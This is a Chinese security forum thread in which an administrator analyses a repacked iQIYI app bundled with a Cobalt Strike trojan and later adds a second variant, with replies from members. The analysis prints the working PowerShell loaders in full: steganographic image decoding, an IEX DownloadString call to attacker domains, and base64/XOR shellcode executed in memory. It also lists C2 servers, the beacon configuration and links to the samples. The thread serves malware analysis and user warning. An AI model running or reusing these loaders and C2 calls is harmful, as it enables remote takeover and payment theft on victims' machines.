吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 167688|回复: 1503
上一主题 下一主题
收起左侧

BanID:zxj397298976【发布软件捆绑Cobalt Strike远控木马】

    [复制链接]
跳转到指定楼层
楼主
Hmily 发表于 2020-9-29 14:54 回帖奖励
BanID:zxj397298976【发布软件捆绑Cobalt Strike远控木马】



今天早晨收到@cxj998 的举报反馈被盗刷
爱奇艺 v7.8.118.2140 去广告优化版-带病毒
https://www.52pojie.cn/thread-1276263-1-1.html

我们着手分析一下看看软件确实发现了问题,软件利用白加黑启动PowerShell脚本加载Cobalt Strike远程控制木马,用来控制受害者机器进行盗刷支付宝金额。


一:木马行为分析
文件下载后发现使用了MSI打包,使用lessmsi解包(也可以正常安装获得文件)


解压后通过文件修改时间顺序排序,轻松发现最后修改的文件很可疑


通过经验(也可以调试下得到)可以看出来App.dll(MD5: 17BD779769DBEC0B58966D066F656A72)加了VMP 2.x的壳是最可疑的了,Appdll.dll其实是正常的app.dll文件,显而易见爱奇艺主程序会主动加载App.dll文件,木马通过替换正常的DLL来做白加黑,所以看下App.dll的代码就好了,vmp 2.x的老版本壳,直接用@ximo 大神的zeus vmp脱壳神器轻松脱掉(当然直接F9跑起来看也行),直接看下字符串只有一行代码:cmd.exe /c powershell -exec bypass -f .\dataup.ps1 ,就是启动根目录下dataup.ps1(F409AE142DE9167CE4CD2B691F8A2A50),它是一个的PowerShell脚本。


重点到了dataup.ps1这,我们看下PowerShell脚本内容是:
[PowerShell] 纯文本查看 复制代码
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://cs40a.microsoftup.pw/down/test22a.png"));$o=a Byte[] 5220;(0..2)|%{foreach($x in(0..1739)){$p=$g.GetPixel($x,$_);$o[$_*1740+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3546]))


这个脚本使用隐写的方式,把代码写到png图片里,根据脚本解密后的内容:
[PowerShell] 纯文本查看 复制代码
Set-StrictMode -Version 2
 
$DoIt = @'
function func_get_proc_address {
        Param ($var_module, $var_procedure)                
        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
        $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
        return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
 
function func_get_delegate_type {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
                [Parameter(Position = 1)] [Type] $var_return_type = [Void]
        )
 
        $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
        $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
 
        return $var_type_builder.CreateType()
}
 
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktEMiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMe2FVbyPLm/M0T+9tiKiKeUGHZ8xtXX2ewq1PsRjmHxmKhrOBUMPrTQ8BzQXEcv96L0tUOUpZCXgC0KayN2Lt2wT5YLEtVDGGucs97+vRI3ZQRlEOYkRGTVcZA25MWUpPT0IMFw0TAwtATE5TQldKQU9GGANucGpmAxQNExgDdEpNR0xUUANtdwMWDRIYAw1tZncDYG9xAxENEw0WExQRFBgDDW1mdwNgb3EDEA0TDRMXFhMVDRATCi4pIw6UpTF1OBjAlT8DAB47//CyyzTsM+BmHocgmMR7DKE52SkaR+G2JTwk5zpgMV8GbPLeYNUr41CiqiJ2BsyQPAnVxMmQc3UhdPWqfNTLumBPH3OZgV72d94bYT6NEM2kQCtOIqSmcbULbvcpieEKbW5yEHfbGZXFK7v9qVsMQg1jjrx+76WkbIQNFQ1cyztF+kgQ8MACW1tZtz18nWGgA6IMlANij8b0bHH33qBDH0CU875iMbLzmdJdLzxfR5++gwkaDiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcQFAXE0INTkpAUUxQTEVXVlMNU1QjMRd1Ww==')
 
for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
}
 
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
 
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
 
If ([IntPtr]::size -eq 8) {
        start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
        IEX $DoIt
}


根据经验(调试多了就知道了),很像Cobalt Strike的PowerShell服务端脚本,从上面的Base64转换然后和35(十进制)进行异或就得到了ShellCode,4KB大小,不出意外就是Cobalt Strike了,那我们继续调试下这个ShellCode。

调试小技巧:比较简单的办法可以把ShellCode的二进制代码直接复制出来,随便找个无壳程序用OD加载,然后把二进制代码从入口点粘贴覆盖进行,就可以正常调试了(覆盖后保存文件重新OD加载一下,这样可以直接Ctrl+A分析下代码)


通过经验,看到ShellCode的API调用方式,再次印证就是Cobalt Strike了,调试过程略过(可以自己学习单步跟踪尝试一下),流程就是ShellCode去cs40a.microsoftup.pw请求获取Beacon核心DLL进行内存解密加载


网络获取的Beacon核心代码先进行自解密出PE,然后进行内存执行


小技巧:解密出PE以后可以直接把这个数据段dump下来,然后用ExeinfoPE来提取DLL




解密后的DLL通过LordPE查看导出模块名称确实是beacon.dll,再再一次印证就是Cobalt Strike了


有了Cobalt Strike的beacon.dll,那我们就看看它的木马配置信息吧,简单的办法直接用6总的神器,在线解密Cobalt Strike配置信息,只需要把bin文件上传即可获得,解密网址:http://pokemon.work:8501


File 4a8abb8f54fd4283af2fde919f923625bc3d6b998b215467ddc125d1b5d2823d receved !

BeaconType - HTTP
Port - 4455
SleepTime - 60000
MaxGetSize - 1048576
Jitter - 0
MaxDNS - 255
PublicKey - b'0\x81\x9f0\r\x06\t\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xa7\t\x91\xd6\x9d\x81j`\x1f\xfa\x80\x97ds\x83\x0f\r;A\'m\'\x90@\x1d\xde\xdb\x18\xe2\xd3\xca\xb3\xc3\x15\xe3"#%\xbeB\xb6Z\xdb(x\xf3?Z\x03\xffP\x10\xb2>\x84Q\x0c\x14\x82\xadjB\xf1\xe7\xe5rn\xb3\x18\x13\xe7Cv@\xedxy\x95_@\x1e\x17,4\xd3QrAYm\xd4\x1f\x8eH\xd3\xd1\xb1\xc2\x88\xe6\xc8u/\xf6]\xc2z\xcc\xcb\xa4\xba\x9c\xd6\xd0\xe4\xdea\x96\xce\xa4\xdaH\r;\x99\xd0\xed\x02\x03\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
C2Server - cs40a.microsoftup.pw,/activity
UserAgent - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
HttpPostUri - /submit.php
HttpGet_Metadata - Cookie
HttpPost_Metadata - Content-Type: application/octet-stream
id
SpawnTo - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
PipeName -
DNS_Idle - 0.0.0.0
DNS_Sleep - 0
SSH_Host - Not Found
SSH_Port - Not Found
SSH_Username - Not Found
SSH_Password_Plaintext - Not Found
SSH_Password_Pubkey - Not Found
HttpGet_Verb - GET
HttpPost_Verb - POST
HttpPostChunk - 0
Spawnto_x86 - %windir%\syswow64\rundll32.exe
Spawnto_x64 - %windir%\sysnative\rundll32.exe
CryptoScheme - 0
Proxy_Config - Not Found
Proxy_User - Not Found
Proxy_Password - Not Found
Proxy_Behavior - Use IE settings
Watermark - 305419896
bStageCleanup - False
bCFGCaution - False
KillDate - 0
bProcInject_StartRWX - True
bProcInject_UseRWX - True
bProcInject_MinAllocSize - 0
ProcInject_PrependAppend_x86 - Empty
ProcInject_PrependAppend_x64 - Empty
ProcInject_Execute - CreateThread
SetThreadContext
CreateRemoteThread
RtlCreateUserThread
ProcInject_AllocationMethod - VirtualAllocEx
bUsesCookies - True
HostHeader -
Done!

C2的服务器地址:
cs40a.microsoftup.pw  (139.162.113.21)

当然了,有兴趣的同学可以手动调试DLL来获取配置信息和相关功能,我已经调试过很多次就不再赘述,关于Cobalt Strike木马相关的文章也有不少,大家可以搜索学习,本文也是借此机会对Cobalt Strike其中一种ShellCode加载方式进行了分析讲解,希望可以帮助到大家。

木马下载地址以及相关文件MD5(解压密码:52pojie):
App.dll MD5: 17BD779769DBEC0B58966D066F656A72
dataup.ps1 MD5: F409AE142DE9167CE4CD2B691F8A2A50
shellcode MD5: DDFE4FA2341F59292BFBA48E30988831
Beacon.dll MD5: 50B9A5F1257F5F392D5415FED80904D7

样本.rar (287.04 KB, 下载次数: 953)

二:溯源分析
通过C2域名非常眼熟,简单搜索了下发现之前360安全卫士在6月份就发过相关的分析:https://www.360.cn/n/11718.html ,原来是持续性作案,一直通过替换热门软件的DLL,进行白加黑启动木马来作案,最后通过各种方式进行大数据检索定位到这位作案的朋友,过程略。。。

相关分析溯源已提交给支付宝安全中心、360安全中心,受害人也已报警,相关信息已提交公安,希望好生招待这位朋友。

三:后话
虽然论坛有很多高手,但我们希望提高所有人的安全意识和识别能力,看上述我的分析,你是不是也想来试试?

学会了之后,有能力分析出问题也可以帮助我们,尽快举报,大家合力保卫论坛安全。

想对那些心怀不轨的人说,你在吾爱破解这样的技术论坛玩这种小伎俩,分分钟就给你剥皮把肉看得清清楚楚了,这里都是活跃在互联网安全界的精英,任何小动作都是自讨苦吃,奉劝那些蠢蠢欲动的人,尽快走入正途,不要误入歧途!

最后感谢大家一直以来对吾爱破解论坛的支持和维护,论坛安全离不开大家监督,任何违法违规的行为都逃不过大家的眼睛和管理的审查,对待此类*渣论坛绝不手软,坚决处罚到底!

免费评分

参与人数 2143吾爱币 +1920 热心值 +1960 收起 理由
Ybit + 1 + 1 我很赞同!
ZiZ6bvD9H + 1 + 1 谢谢@Thanks!
stcompa + 1 + 1 我很赞同!
wangxianshen521 + 1 + 1 我很赞同!
msdfq + 1 + 1 我很赞同!
mikuhatsune + 1 + 1 用心讨论,共获提升!
大牙船长 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
顾安 + 1 + 1 我很赞同!
ghostscorpion + 1 + 1 我很赞同!
fun054 + 1 我很赞同!
q844088577 + 1 + 1 我很赞同!
glz220 + 1 已经处理,感谢您对吾爱破解论坛的支持!
吃人 + 1 + 1 我很赞同!
中分 + 1 + 1 我很赞同!
佳偶君 + 1 + 1 我很赞同!
e5500236 + 1 我很赞同!
qdsyok + 1 + 1 我很赞同!
sht281 + 1 + 1 谢谢@Thanks!
xingxia + 1 + 1 用心讨论,共获提升!
NathanielWang + 1 我很赞同!
chen1860906 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
CJAOAN + 1 + 1 用心讨论,共获提升!
zwabat + 1 + 1 我很赞同!
88215 + 1 + 1 我很赞同!
A012836 + 1 + 1 我很赞同!
yuxinmo + 1 + 1 感谢您的宝贵建议,我们会努力争取做得更好!
wushan2010 + 1 + 1 我很赞同!
yimeng0826 + 1 我很赞同!
James·Bond + 1 我很赞同!
sniaw + 1 谢谢@Thanks!
abyxql + 1 谢谢@Thanks!
cxueyi + 1 + 1 热心回复!
白云点缀的蓝 + 1 + 1 谢谢@Thanks!
wapj314159 + 1 + 1 我很赞同!
xiarimomocha + 1 + 1 用心讨论,共获提升!
srysfjx + 1 + 1 我很赞同!
pangdingxiong + 1 + 1 热心回复!
hahha2003 + 1 我很赞同!
hackone111 + 1 + 1 用心讨论,共获提升!
Saki + 1 + 1 膜拜一下~~~~
bjd1111 + 1 + 1 我很赞同!
heywell + 1 + 1 我很赞同!
在下 + 1 + 1 谢谢@Thanks!
XW2PJ + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
X7G7 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
chiker + 1 + 1 这才是真正的高手
voodoo123 + 1 谢谢@Thanks!
HillBoom + 1 + 1 用心讨论,共获提升!
tianyh + 1 + 1 我很赞同!
XiXi0916 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Demon7 + 1 + 1 我很赞同!
吾爱咖啡 + 1 + 1 谢谢@Thanks!
56x12 + 1 + 1 我很赞同!
19511626267 + 1 + 1 我很赞同!
996Good + 1 + 1 用心讨论,共获提升!
Air_Pot + 1 + 1 我很赞同!
lw05211 + 1 + 1 热心回复!
peterrichoor + 1 + 1 我很赞同!
ordinarysoul + 1 + 1 我很赞同!
llmzai + 1 我很赞同!
craneL61015 + 1 + 1 我很赞同!
z1502385 + 1 我很赞同!
洹京右 + 1 + 1 谢谢@Thanks!
Bingo1992 + 1 + 1 谢谢@Thanks!
lemonback + 1 + 1 我很赞同!
jianhuo + 1 我很赞同!
whl0721 + 1 我很赞同!
RamblerGz + 1 用心讨论,共获提升!
偏爱凉茶 + 1 + 1 我很赞同!
我要进去 + 1 + 1 用心讨论,共获提升!
酷柠 + 1 热心回复!
HideMyEye + 1 我很赞同!
jinlai1955 + 1 我很赞同!
rrdqwnc + 1 + 1 我很赞同!
Sean206 + 1 我很赞同!
xingguofan + 1 + 1 我很赞同!
wmxuan + 1 + 1 用心讨论,共获提升!
AlexanderB + 1 + 1 我很赞同!
alexluck + 1 谢谢@Thanks!
z656245201 + 1 + 1 我很赞同!
青霄飞羽 + 1 + 1 我很赞同!
Cyc1e + 1 我很赞同!
xfzsun + 1 + 1 我很赞同!
LynnGarcia + 1 我很赞同!
aek + 1 + 1 我很赞同!
清泉飞扬 + 1 + 1 我爱吾爱破解
NM$L + 1 + 1 用心讨论,共获提升!
3631979 + 1 我很赞同!
黄叁2019 + 1 我很赞同!
starwubin + 1 + 1 我很赞同!
001moyu + 1 我很赞同!
allan911 + 1 + 1 我很赞同!
dragonboston + 1 + 1 我很赞同!
blankhang + 1 谢谢@Thanks!
oyng + 1 + 1 我很赞同!
wowopiao + 1 + 1 我很赞同!
q14413 + 1 论坛需要你这样的人
post33221 + 1 我很赞同!
Coptis_china + 1 谢谢@Thanks!
wakfbycf + 1 用心讨论,共获提升!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

来自 686#
 楼主| Hmily 发表于 2020-11-6 11:11 |楼主
今天凌晨小黑继续作恶,这次换个一个软件“账号多开助手V2.0_a”,替换bin\up.dll(MD5: CBBF79F1DB95FFD2FD0A891052178C40)来加载木马webup.ps1,更新木马信息:
webup.ps1
[PowerShell] 纯文本查看 复制代码
Start-Sleep -Seconds 1800
IEX(New-Object Net.WebClient).DownloadString('http://upc40a.svchostdata.pw/down/upc40asvchostdatapw/dataup.ps1')


dataup.ps1
[PowerShell] 纯文本查看 复制代码
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://upc40a.svchostdata.pw/down/upc40asvchostdatapw/202010a/com202010a.png"));$o=a Byte[] 3740;(0..16)|%{foreach($x in(0..219)){$p=$g.GetPixel($x,$_);$o[$_*220+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3546]))


用Invoke-PSImage隐写图片里,解密:
[PowerShell] 纯文本查看 复制代码
function func_get_proc_address {
        Param ($var_module, $var_procedure)                
        $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
        $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
        return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
                [Parameter(Position = 1)] [Type] $var_return_type = [Void]
        )

        $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
        $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

        return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktSMiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMchpGTiPH8FZ/3nsZKQBQZo6R+O7Pqu6cfl+yux3Me+ZY+EU2/C8hFSEa7KiOL8138Wxr1YUiDi+6Hrvnaq2bosGns0KKxJHU+ESu/Y/sI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RKTRUXGANbFRcYA3dRSkdGTVcMFg0TGANuYmJ2GANtcxMbCi4pI5RtW9NCIfJIh5Tw2itR/i03kx8rSoWD0vJ7J0U1t6oOJz6hkh+KXZI6iZlBoze+vNv0BpA5GZeKvOpvJ8twoolo+HTxPaCK+RToZ+ZtDDqOHBlawoZd6jtqO4BadbP2vQ8j3XIcDft0mvJHLzxR/6kZzeLtubZS+WbWDoFxUtoI91fF/7mKq5qvSEYIqqLgIt/LTvBuYfXxLEb0hNE42JpH8xxshDR2VqEx7zWnmOqhYEcNbaumSykrmalXTOA5z9V7QOg4VgqbTyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcQFAXE0INTkpAUUxQTEVXVlNCDUBMTiMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))$var_runme.Invoke([IntPtr]::Zero)


Base64解出来shellcode去http://cs40a.microsoftupa.com:4465/Q9em请求Cobalt Strike的核心beacon.dll,把dll上传到解密网址:http://pokemon.work:8501 获得配置信息:


File 1f2ded693f9efed0c877a1e0055bfe44fc7167d60d0275611e41bd79c8ed1c3e receved !
BeaconType - HTTP
Port - 4465
SleepTime - 60000
MaxGetSize - 1048576
Jitter - 0
MaxDNS - 255
PublicKey - b'0\x81\x9f0\r\x06\t\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xa7\t\x91\xd6\x9d\x81j`\x1f\xfa\x80\x97ds\x83\x0f\r;A\'m\'\x90@\x1d\xde\xdb\x18\xe2\xd3\xca\xb3\xc3\x15\xe3"#%\xbeB\xb6Z\xdb(x\xf3?Z\x03\xffP\x10\xb2>\x84Q\x0c\x14\x82\xadjB\xf1\xe7\xe5rn\xb3\x18\x13\xe7Cv@\xedxy\x95_@\x1e\x17,4\xd3QrAYm\xd4\x1f\x8eH\xd3\xd1\xb1\xc2\x88\xe6\xc8u/\xf6]\xc2z\xcc\xcb\xa4\xba\x9c\xd6\xd0\xe4\xdea\x96\xce\xa4\xdaH\r;\x99\xd0\xed\x02\x03\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
C2Server - cs40a.microsoftupa.com,/dot.gif
UserAgent - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)
HttpPostUri - /submit.php
HttpGet_Metadata - Cookie
HttpPost_Metadata - Content-Type: application/octet-stream
id
SpawnTo - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
PipeName -
DNS_Idle - 0.0.0.0
DNS_Sleep - 0
SSH_Host - Not Found
SSH_Port - Not Found
SSH_Username - Not Found
SSH_Password_Plaintext - Not Found
SSH_Password_Pubkey - Not Found
HttpGet_Verb - GET
HttpPost_Verb - POST
HttpPostChunk - 0
Spawnto_x86 - %windir%\syswow64\rundll32.exe
Spawnto_x64 - %windir%\sysnative\rundll32.exe
CryptoScheme - 0
Proxy_Config - Not Found
Proxy_User - Not Found
Proxy_Password - Not Found
Proxy_Behavior - Use IE settings
Watermark - 305419896
bStageCleanup - False
bCFGCaution - False
KillDate - 0
bProcInject_StartRWX - True
bProcInject_UseRWX - True
bProcInject_MinAllocSize - 0
ProcInject_PrependAppend_x86 - Empty
ProcInject_PrependAppend_x64 - Empty
ProcInject_Execute - CreateThread
SetThreadContext
CreateRemoteThread
RtlCreateUserThread
ProcInject_AllocationMethod - VirtualAllocEx
bUsesCookies - True
HostHeader -
Done!

C2:cs40a.microsoftupa.com (139.162.97.239)
beacon.7z (87.91 KB, 下载次数: 124) 解压密码:52pojie

免费评分

参与人数 16吾爱币 +17 热心值 +15 收起 理由
幸运鹅 + 1 + 1 什么是大神?别人在读书,而我在看天书
bnb033 + 1 + 1 用心讨论,共获提升!
白云点缀的蓝 + 1 热心回复!
聚爱成行 + 1 谢谢@Thanks!
fanssong + 2 + 1 H大,虽然没见面,但是仰慕你好久了,也被你批评过,感觉你好厉害
cr4ck0r + 1 + 1 我很赞同!必须严惩!
woyunsile + 1 + 1 谢谢@Thanks!
nedesq + 1 + 1 52破解就是这群人的蜜罐+1
baicai12138 + 1 + 1 我很赞同!
五岁杀人 + 1 + 1 用心讨论,共获提升!
新手上机 + 1 + 1 神奇
bingbingbd + 1 + 1 我很赞同!
caoxi158 + 1 谢谢@Thanks!
古笙 + 1 + 1 谢谢@Thanks!
缥缈孤鸿影 + 1 + 1 我很赞同!
烟99 + 3 + 1 用心讨论,共获提升!

查看全部评分

推荐
 楼主| Hmily 发表于 2020-9-29 15:04 |楼主
yanglinman 发表于 2020-9-29 15:03
吓得我不敢再转发软件了,自己的识别能力低,万一那次碰上了,就玩完了,还是做一个安分守己的潜水者保险!

时至今日,你还不来学点技术吗?搬运工有技术大拿帅吗?

免费评分

参与人数 26吾爱币 +22 热心值 +24 收起 理由
白云点缀的蓝 + 1 我很赞同!
Bimice + 1 + 1 我很赞同!
lhb12138 + 1 + 1 用心讨论,共获提升!
52planean + 1 + 1 我很赞同!
gushiwei + 1 + 1 我很赞同!
satan1912 + 1 我很赞同!
babyxuanye + 1 + 1 我哭了
温馨你的心 + 1 + 1 用心讨论,共获提升!
鲲鲲爱技术 + 1 + 1 我很赞同!
冰糖葫芦五加皮 + 1 + 1 我很赞同!
alterkoo + 1 + 1 我很赞同!
in000__ + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
maxshihe + 1 我很赞同!
andi66699 + 1 + 1 我很赞同!
lhwx + 1 + 1 谢谢@Thanks!
kexinkids + 1 + 1 我很赞同!
suiyunfeng + 1 + 1 我很赞同!
跑跑的泡泡 + 1 不知道 如何入门学习
Gipors + 1 技术大拿最帅!!
时光稀释 + 1 就一个字”帅“
大喃_ + 1 + 1 我很赞同!
xiafan + 1 + 1
forever880day + 1 + 1 我很赞同!
cxfyg + 1 + 1 我很赞同!
BFWJ-china + 1 + 1 我很赞同!
felixwang1024 + 1 + 1 我很赞同!

查看全部评分

推荐
yanglinman 发表于 2020-9-29 15:03
吓得我不敢再转发软件了,自己的识别能力低,万一那次碰上了,就玩完了,还是做一个安分守己的潜水者保险!

点评

时至今日,你还不来学点技术吗?搬运工有技术大拿帅吗?  详情 回复 发表于 2020-9-29 15:04

免费评分

参与人数 3吾爱币 +2 热心值 +3 收起 理由
new天方夜谭 + 1 + 1 我很赞同!
baicha123 + 1 我很赞同!
woyunsile + 1 + 1 谢谢@Thanks!

查看全部评分

推荐
情谊 发表于 2020-9-29 15:21
我觉得对含有病毒帖子应该把关键信息隐去,留作存档,给大家参考
推荐
涛之雨 发表于 2020-9-29 15:14

H大护体!百毒不侵!

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
Nghitsong + 1 + 1 你这个图6的飞起呀!

查看全部评分

推荐
wyy81061 发表于 2020-9-29 15:10
幸好我是爱奇艺会员没有下载
推荐
那年夏天52 发表于 2020-9-29 15:04
6的一批呀,铁子
推荐
heidiansama 发表于 2020-9-29 15:09
H大真帅 我正在学powershell

点评

那正好试试解密下上面内容。  详情 回复 发表于 2020-9-29 15:20

免费评分

参与人数 1吾爱币 +1 收起 理由
a96jun + 1 我很赞同!

查看全部评分

推荐
RUI164605 发表于 2020-9-29 15:07
感谢版主及各位高手勤勉负责的态度
推荐
iflower 发表于 2020-9-29 15:08
吃瓜群众路过围观。
还好咱不用iqi艺看电影什么的,
白嫖虽好,但也要注意安全。

沙发
Defender 发表于 2020-9-29 14:56
大家都检查一下自己是否下载过,如果下载过尽快删除文件,再进行杀毒吧。
3#
wuai6757620 发表于 2020-9-29 14:59
大佬牛逼!!!!
4#
speedboy 发表于 2020-9-29 15:00
防不胜防啊
您需要登录后才可以回帖 登录 | 注册[Register]

